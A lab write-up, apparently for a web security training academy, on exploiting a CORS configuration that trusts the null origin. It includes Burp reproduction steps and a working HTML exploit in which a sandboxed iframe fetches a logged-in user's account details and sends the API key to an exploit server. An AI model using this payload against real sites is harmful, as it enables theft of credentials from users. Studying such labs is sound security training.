CORS vulnerability with trusted null origin

Description

This website has an insecure CORS configuration in that it trusts the null origin.

Reproduction and proof of concept

  1. Start Burp, foxyproxy, and with intercept off, log in to wiener:peter on the target site and access the account page.

  2. In Burp, review the HTTPhistory. The API key is retrieved via an AJAX request to /accountDetails, and the response contains the Access-Control-Allow-Credentials header suggesting that it may support CORS.

  3. Analysis:

  • Browsers will never send cookies if wildcard origins are used, regardless of the content of the Access-Control-Allow-Credentials header. The inclusion of the session cookies in the request, so wildcard origins can not be abused here.

  • Null origin allows access to the response if the Access-Control-Allow-Credentials header is set to true.

  1. Send the request to Burp Repeater, and resubmit it with the added header Origin: null. Check that the null origin is reflected in the Access-Control-Allow-Origin header of the response.

CORS

Took a break. Timed out. lab-id change.

  1. Create exploit (replacing lab-id and exploit-server-id). The iframe sandbox generates a null origin request.

<html>
    <body>
        <iframe style="display:none" sandbox="allow-scripts" srcdoc="<script>
            var req = new XMLHttpRequest();
            var url = 'https://lab-id.web-security-academy.net/'
            
            req.onreadystatechange = function () {
                if (req.readyState == XMLHttpRequest.DONE) {
                    fetch('https://exploit-server-id/log/key=' + req.responseText)
                }
            };
            
            req.open('get', url + 'accountDetails',true);
            req.withCredentials = true;
            req.send(null);
        </script>"></iframe>
    </body>
</html>

  1. Go to the exploit server and enter the exploit in the body field of the form.

  2. Click View exploit and check you land on the log page and check the API key of the current account is in the URL.

CORS

  1. Deliver exploit to victim.

  2. Go to Access log

CORS

  1. Copy the administrator’s API key, and enter it as solution to the lab.

Exploitability

An attacker needs to craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to the exploit server.